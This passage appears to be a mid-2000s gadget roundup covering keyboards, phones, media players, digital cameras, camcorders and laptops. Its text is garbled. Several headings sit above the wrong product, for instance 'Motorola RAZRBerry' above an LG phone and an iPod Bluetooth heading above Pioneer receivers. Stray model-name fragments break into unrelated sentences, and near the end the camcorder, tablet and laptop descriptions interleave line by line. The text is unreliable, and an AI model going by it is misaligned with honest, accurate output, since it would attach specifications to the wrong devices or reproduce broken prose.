Dark Side and Rebel Alliance flavors. The systems
come equipped with the AMD Athlon 64 FX-55 CPU.
They’ll be on sale to the public soon for a yet
undisclosed price.
Max Shooter Console PS/2 Adapter
for X-box & PS2
Well the name says it all. This peripheral will finally
give the PC gamers a chance to prove themselves when
playing on PS2 & X-box. Especially if u are playing
Xbox Live. Simply plug in this device, then connect a
PS/2 keyboard and mouse into it and you are ready to
play with some of the default configurations already
saved. The Max Shooter comes preloaded with
configurations for many of the latest FPS games out
and also allow for customization.
The actual adapter is small in size and doesn’t hog any
serious amount of extra space. The XBOX version
features an extra slot on the backside of the adapter for
a memory card to plug in.
Logitech MX 5000 LCD Keyboard
Logitech has released an LCD keyboard for the regular
computer users. This keyboard has a slew of
interesting features including an external temperature
sensor, a ‘dashboard’ displaying the time and current
user, along with media and email notifications. There’s
even a feature that turns the keyboard itself into a
calculator, using the keypad, and then pastes the results
into the clipboard. Plus it’s cordless. Super cool.
Logitech G15 Gaming Keyboard
Logitech has finally released a keyboard tailored to the
computer gamer. The new Logitech G15 has some nice
features that are actually tailor-made for gamers. The
most acknowledged feature is probably the LCD
screen on the keyboard. Keyboard macros can be setup
on the physical keyboard while in game. Also while
not gaming the LCD screen can read media
information, display CPU information, email alerts and
the keyboard even comes with a software development
kit so the coding gamers can write their own programs
to display information on the LCD. Backlit keys and a
“gaming button” that disable the windows key are also
nice.
OziQ All-In-One PC I-mate SP3i

All-in-one PCs have been around for a while now, but

this one is pretty unique. Tucana Innovations, an
Australian company, has fitted the entire PC, optical
drive and all, behind a standard LCD panel. Good for
people u like the design of the Mac, it is useful for
being used as small desktops, or in libraries, kiosks,
etc.

This is a hardcore smart phone for those hardcore

mobile warriors of today. I-mate sports Windows
Mobile 2003 edition for a giant explosion of
PDA/smart phone capabilities. This phone has it all:
Internet Explorer, Media Player, Bluetooth,
LG B2250 Wafer Thin expandable memory, IR port, email, USB charging,
large screen, extra batteries and even a calculator.

Motorola RAZRBerry

LG Corp. is crafting a new tri-band GSM phone that is

just 15mm (.59”) that right just 15mm thin. Before you
bay for my blood & compare this to the Siemens CC75
phone which is .50” let me tell you the other features.
It features a 262k TFT screen and a multi-color
backlight. It is a Tri-Band phone with GPRS, WAP,
Java, VGA-camera, 40-tones polyphony, MMS, SMS
and EMS, Measures converter, Calculator and World
Time. It runs on a Li-Ion 780 mAh battery, which
gives you a Talk time of up to 3.5 hours and Standby
time up to 250 hours.

The new Motorola RAZR features Windows Mobile

OS 5 and sports the new Freescale Neptune LTE +
Intel Bulverde Chipset. It is a Quadband GSM phone,
with GPRS (Class 10), EDGE (Class 6), 64 MB Pioneer VSA-AX4AVi and VSX-
Memory (Less compared to Nokia N91) 128 MB
Flash Memory, Mini SD Card Slot, 2.4” Display, AX2AV
Bluetooth, IrDA, 1.3 Mega pixel (1280x960) Camera
with Integrated flash, Dual Stereo speakers,
Thumbwheel, 5 way Nav Key,Left and Right soft keys,
Dedicated Camera Key, Voice Recognition software
for Voice Activated Dialing, High level of
Personalization options, light weight only 115g with
Battery & cards. Comes with a 1130 mAh (TBD)
battery, which has a talk time of 4 hours & standby
time of 8 days. It is in direct competition to blackberry
& other smartphones.

Bluetooth Wireless Module for iPod
Pioneer just dropped two new receivers, the VSA-
AX4AVi and the VSX-AX2AV. Both are 7-channel
amplifiers, they support HDMI & WMA9 encoding.
The VSA-AX4AVi is tres hot because it accepts USB
connections from all kinds of audio players including
the Apple iPod. Otherwise, the differences are pretty
standard: the 7-channel VSA-AX4AVi rocks at 220W
per channel and the VSX-AX2AV runs 200Wx7
channels.

Denon Smart Life S-101

FM transmitters, step aside. Bluetooth audio

transmitters are the wave of the future. Scosche has
just released a Bluetooth wireless interface for iPod
and other MP3 players that will enable streaming audio
from your portable player to your car or home receiver.
It connects directly to the headphone jack, and
transmits to a receiver connected to either a car’s head
unit or home audio system.
The Denon Smart Life S-101 is sweet enough as your
standard home theater system: couple of flat speakers,
100W subwoofer, and an adorably packaged
progressive-scan DVD player. But the real cherry on
the top here is that it plays super-nicely with your
existing iPod. You connect it via its dock connector,
which allows you to control your iPod from the remote
and charges the iPod at the same time. It then displays
a “virtual iPod” on the television screen that displays
your songs and the iPod controls, and if you have
photos stored on it, you can view them as well. Will be
launched around September.
 Archos AV700
TonePro USB-Powered Hendrix

Line 6, makers of digital audio gear has a new line of

hardware due this season called the TonePro. Plug a
guitar, bass, or mike into the TonePro, jack it into a
CPU, and you have a clean sounding room along with
a software UI that looks just like an amp. TonePort
UX1 and UX2 hardware interfaces are USB-powered
devices that include Line 6 GearBox modeling
software, which provides a must-have collection of
guitar and bass amp/cab models, stompbox and studio
effects, and models of high-end studio microphone
preamps. Both units support 44.1/48KHz with 16/24-
bit recording, a 96KHz mode, and drivers for ASIO,
WDM, and Core Audio.
GPX2 - PEPpy PEP
This sweet baby has a very cool & sweet 7-inch screen
with 262k colors which will blow you away. If not that
then surely the Hugh 100 GB storage space will. It has
the ability to store a wide variety of video and audio
formats, and is able to act as a Windows Media device.
The screen sports a handy layer of anti-reflective
coating. At its maximum setting, brightness levels are
very good indeed, but the contrast is ok. It has a very
small buttons for navigation, but is of good quality &
responds very well. It comes bundled with a TV
Docking Pod which lets you to use the player either as
a source or as a recording or playback device. It has an
integrated USB 2.0 mini jack, that lets the device
mount either as a USB Mass Storage Device or as a
Windows Media device (as part of its ability to
synchronize with Windows Media Player 10. Also
present is a USB host connector, which lets users
transfer media directly from compatible devices such
as digital cameras or other audio/video players -
extremely handy.

It is presently available in 2 configurations of 40GB

and 100 GB.

The GPX2 is a personal entertainment player (PEP)

with a nice, 3.5” LCD and support for just about
everything under the sun, including DRMed WMA et
al. It runs on Linux. It has plenty of games already
available under MAME and NES emulators and it
plays back pirate friendly OGG and DivX formats.
This ARM-based player contains 64MB built-in
memory and supports SD. Nice and thin and sexy.
Creative Zen Vision PMP
It features a 30 GB of hard drive space, a 3.7-inch
262K colour screen and support for a flurry of audio
and video formats, this pocket-sized Creative Zen
Vision is set to make an impact. The device supports
audio playback, photo viewing and video playback,
with the user interface being navigated by means of a
navigational array flanking the screen on its right side.
It plays numerous formats including DRM files. It will
also be able to download music from a number of
online offerings such as Napster To Go, Yahoo! Music
Unlimited and more. It has a USB 2.0 connection port
and an integrated CompactFlash Type II slot to allow
for direct transfer of media to the internal hard drive of
the unit. Also present is Composite video out, with
support for NTSC and PAL standards. In addition to its
media capabilities, the Zen Vision also comes with
software which allows for the synchronization of
Contacts, Calendar and Tasks data from Microsoft
Outlook. It has a a battery life of up to 4.5 hours for
video playback. The Creative Zen Vision is
immediately available for in the US. It is available in
either pearl white or black.
LG
PM70
A 4.3" exceptionally bright and clear screen with 262K
colours , a 16:9 widescreen format, 30 GB HDD. Still,
the list of features found in the PM70 is enough to
make anyone interested in portable media viewers take
a second look. It will support a Hugh range of video &
audio formats, & even supports JPEG & BMP photo
formats. It has a FM tuner & also allows FM
recording. The PM70 also features the ability to
synchronize PIM information with Microsoft Outlook,
which is most certainly a feature not present in any
current PMC devices except Creative Zen Vision PMP.
Topping off such a comprehensive feature set is USB
2.0 connectivity, and a claimed battery life of 16 hours
of audio playback or 4 hours of video playback. It will
be commercially available some time in the fourth
quarter of 2005.
Casio Exilim EX-Z500
The Casio Exilim EX-Z500 is a 5 Megapixel camera,
with 3x optical zoom with electronic image
stabilization. It boasts of a 2.7-inch LCD viewfinder
and (what they claim to be, but yet unconfirmed) the
ability to snap 500 shots on a single charge. It has a
minimum focusing range of 17 cm. ISO sensitivity
from 50 to 800. Offers 31 preset scene modes along
with a shutter priority mode. It relies on SD/MMC
Cards for storage. Has USB 2.0 connectivity & support
for PictBridge. It is available presently in the market,
but only in Black colour.
Sony Cyber-shot DSC-W7 Digital
Camera
This Sony Cyber-shot® DSC-W7 digital camera
delivers stunning pictures with 7.2-megapixel
resolution. It features a 3x optical zoom & an
additional 2x digital zoom. The camera comes with
32MB of internal memory, & has in-built slot for
Memory Stick or Memory Stick PRO cards. It runs on
2 AA batteries. It has an enormous 2.5" LCD screen. It
comes with Carl Zeiss Vario-Tessar lens. It is
PictBridge enabled.
Panasonic Lumix DMC-LZ2 Digital
Camera
The Panasonic DMC-LZ2 digital camera captures
outstanding pictures with 5-megapixel resolution this
means you can blow-up your pictures up to sizes as big
as 23 cm x 48 cm. It has a superb & yet unbeatable 6x
optical zoom, that is the highest in a camera in the
compact cameras segment. It has an additional 4x
digital zoom too. It uses the Lumix DC Vario lens,
which is made by Lecia & Panasonic. It has a large 2"
LCD screen. It features an Optical image stabilizer, the
only brand in the world which has that in a compact
size camera. So you no longer have to worry about
shaky hands blurring a shot—the optical image
stabilization system keeps pictures focused. It has a
super-fast response called the MegaBurst consecutive
shooting, that lets you snap off consecutive shots at 3
frames per second with full resolution.
It is PictBridge enabled, so simply connect this camera
to any PictBridge enabled printer to print pictures
without a PC.
Canon PowerShot S2 IS
The Canon PowerShot S2 IS features a 5 megapixel
CCD chip for great pictures. It features a 12x optical
zoom that lets you get up close to an object before you
take. It comes with a 1.8" LCD screen. It has Canon's
DIGIC II Image Processor which is designed to
improve processing speed and image quality. It has
Canon’s iSAPS Technology which works with the fast
DIGIC II Image Processor to improve focus speed and
accuracy, as well as exposure and white balance.
Panasonic Lumix® DMC-FZ5
Digital Camera
The Panasonic DMC-FZ5 digital camera captures
outstandingly sharp & clear pictures with its 5-
megapixel CCD. You get superb picture quality with
either the 6”x 4” or the full blow-up of up to sizes as
big as 23 cm x 48 cm. It has a superb & yet sharp 12x
optical zoom, & an additional 4x digital zoom. It uses
the extremely high quality & popular Leica DC Vario
lens. It has a large 1.8" LCD screen. It features an
Optical image stabilizer technology called “MEGA
O.I.S.”, which takes care of all the shaky hands
blurring a shot by keeping the pictures focused. It has a
super-fast response called the MegaBurst consecutive
shooting, that lets you snap off consecutive shots at 3
frames per second with full resolution. It uses SD card
& MultiMediaCard for storage. It is PictBridge
enabled, so simply connect this camera to any
PictBridge enabled printer to print pictures without a
PC. You can even connect it to the TV, & watch the
pictures as a slide show. Another plus point of the
camera is it has the ability to take pictures in f2.8
throughout the entire zoom range. It is lighter & more
professional looking & quieter than any other camera
in the class or in the budget range. It is better than the
Sony H1, Canon S1 IS & S2 IS, Kodak 7590, or the
Olympus C-770, so if you are thinking of buying any
of these cameras have a look at Panasonic FZ5 before
you decide.
JVC Everio GZ-MC500E
Here is one of the first series of hard drive based
camcorders, the JVC Everio GZ-MC500E & it has the
ability to compete head-to-head with tape based
competitors. Its exterior is a tad more unusual than
most cameras, & the entire camera body can rotate up
to 45 degrees in either up or down along the vertical
axis of the lens. It is very compact & light weight. It
features a 10x optical zoom lens (8x for still images)
with three separate 1/4.5-inch, 1.33 Megapixel CCD
chips (it is a 3CCD camera). It has a SD Card and
CompactFlash Type II expansion slots, with the latter
by default occupied by a 4 GB MicroDrive. This
allows for hassle-free expansion and broad
compatibility with media readers and laptops
everywhere. It has an integrated USB 2.0 connectivity
port for a much easier way to transfer data.
Additionally, PictBridge and DPOF support are
available for direct-to-printer output. It has a 1.8-inch
LCD screen. Audio can be recorded in 16-bit dual
channel Dolby Digital format at 48 kHz and a bit rate
of 1.536 Kbps. It is immediately available in Europe &
North America.
Panasonic Camcorder NV-GS35 Motion Computing LS800 Tablet PC

We all know Tablet PCs aren’t selling all that

fantastically well these days, but if a convertible just
The Panasonic NV-GS35 is a excellent camera in the isn’t for you, or maybe you’re looking for something a
single CCD range of cameras, & it is the only one with little smaller, you might want to peep Motion
a Humongous 30x Optical Zoom, & 1000x Digital Computing’s LS800 8.4-inch tablet device. The device
Zoom. It has 2.5” LCD screen. It comes with 2 remotes is a svelte 2.2-pounds and is only about 8.9 x 6.7 x 0.9-
one wired & basic for recording, taking snaps, & inches. It is equipped with a 1.2GHz Pentium M ULV
zooming, & the other a fully functional Infra-red CPU, integrated WiFi, Bluetooth, biometric print
remote. It has a colour viewfinder, direct mode Dial for reader, two USB ports, and an SD slot.
easier use, a in-built video light. It has super image
stabilizer (electronic stabilizer); Zoom Mike, which Fujitsu LifeBook N6200
lets you pick distant sounds; a special Wind Cut
feature which contributes to reducing wind noise;
Colour Night View; Quick starts in 1.7 secs; can be
used as a Web-cam. It has an integrated SD card/
MMC card slot for storing pictures. It has a really cool
feature called the “Simultaneous Motion Video & Still
Picture Recording” which lets you to record videos in
tape & at the same time take snaps which are stored in
the SD/MMC card, without delaying or affecting one
another. It has an USB 2.0 port, for transferring video
& still data from the camera to the PC, it even has the
USB streaming option which lets u to transfer video to
the PC at the speed of 480 Mbps. It is the best camera
in the price range & features range. Fujitsu LifeBook N6200 is a really cool laptop, which
qualifies to be a full-size desktop replacement packing
Pentium M, a 17-inch WXGA TFT LCD, ATI
Mobility Radeon X600 graphics with 128 MB video
memory, 802.11a/b/g and Gigabit Ethernet, Memory
Stick/SD/xD card slots, and 3D Dolby audio with
subwoofer. Tooled for gamers and multimedia
producers/consumers, it’ll come in configurations up to
2GB DDR2 RAM and your choice of a slower 200GB
or faster (7200 rpm) 60GB internal drive.